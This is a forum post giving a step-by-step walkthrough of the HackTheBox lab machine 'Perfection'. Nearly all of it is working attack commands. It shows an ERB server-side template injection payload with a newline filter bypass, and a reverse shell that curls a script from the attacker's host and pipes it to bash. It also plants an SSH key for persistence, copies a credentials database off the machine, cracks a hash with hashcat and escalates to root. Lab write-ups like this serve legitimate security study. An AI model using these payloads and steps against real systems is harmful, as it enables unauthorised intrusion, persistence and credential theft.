perfection.htb
by rustydusty - Tuesday March 19, 2024 at 06:45 PM
#1
sudo nmap -sTVC -AO -p- perfection.htb
22/tcp open  ssh    OpenSSH 8.9p1 Ubuntu 3ubuntu0.6 (Ubuntu Linux; protocol 2.0)
80/tcp open  http    nginx

# In Burp Suite, the POST request sent by the "Weighted Grade Calculator" is vulnerable to SSTI (server-side template injection)
# link for reference: https://book.hacktricks.xyz/pentesting-w...n#erb-ruby

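# this returns 49, i.e. the ERB expression 7*7 was evaluated on the server
# The %0A (newline) ahead of the tag suggests the input filter only validates the first line;
# in Ruby, validation regexes should be anchored with \A and \z rather than ^ and $.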
category1=test%0A<%25%3d+7*7+%25>&grade1=100&weight1=20&category2=science&grade2=100&weight2=20&category3=English&grade3=100&weight3=20&category4=somthing&grade4=100&weight4=20&category5=N%2FA&grade5=100&weight5=20

# Set up a reverse shell in rev.sh 'bash -i >& /dev/tcp/10.10.14.80/4444 0>&1'
# Set up a listener  'nc -nlvp'
# Curl the request into bash and get your shell
test%0A<%25%3d+`curl+http://10.10.14.80/rev.sh|bash`+%25>&grade1=100&weight1=20&category2=science&grade2=100&weight2=20&category3=English&grade3=100&weight3=20&category4=somthing&grade4=100&weight4=20&category5=N%2FA&grade5=100&weight5=20

# once you have a shell, set up persistence by echoing in your public key
echo 'rsa-public-key' > /home/susan/.ssh/authorized_keys

# restrict permissions on the authorized_keys file
chmod 600 /home/susan/.ssh/authorized_keys

# ssh as susan into the machine
ssh susan@10.10.11.253

# Look around and find a DB file
Migration/pupilpath_credentials.db

# exfiltrate the file (scp also needs a local destination path as its last argument)
scp susan@perfection.htb:Migration/pupilpath_credentials.db

# read mail
cat /var/spool/mail/susan

# crack the password hash (hashcat mode 1400 = SHA2-256, -a 3 = mask attack; ?d is one digit)
hashcat -m 1400 hash.txt -a 3 susan_nasus_?d?d?d?d?d?d?d?d?d

# once you crack susan's password, switch user to root
sudo su

cat /root/root.txt


Thanks have a nice day! Smile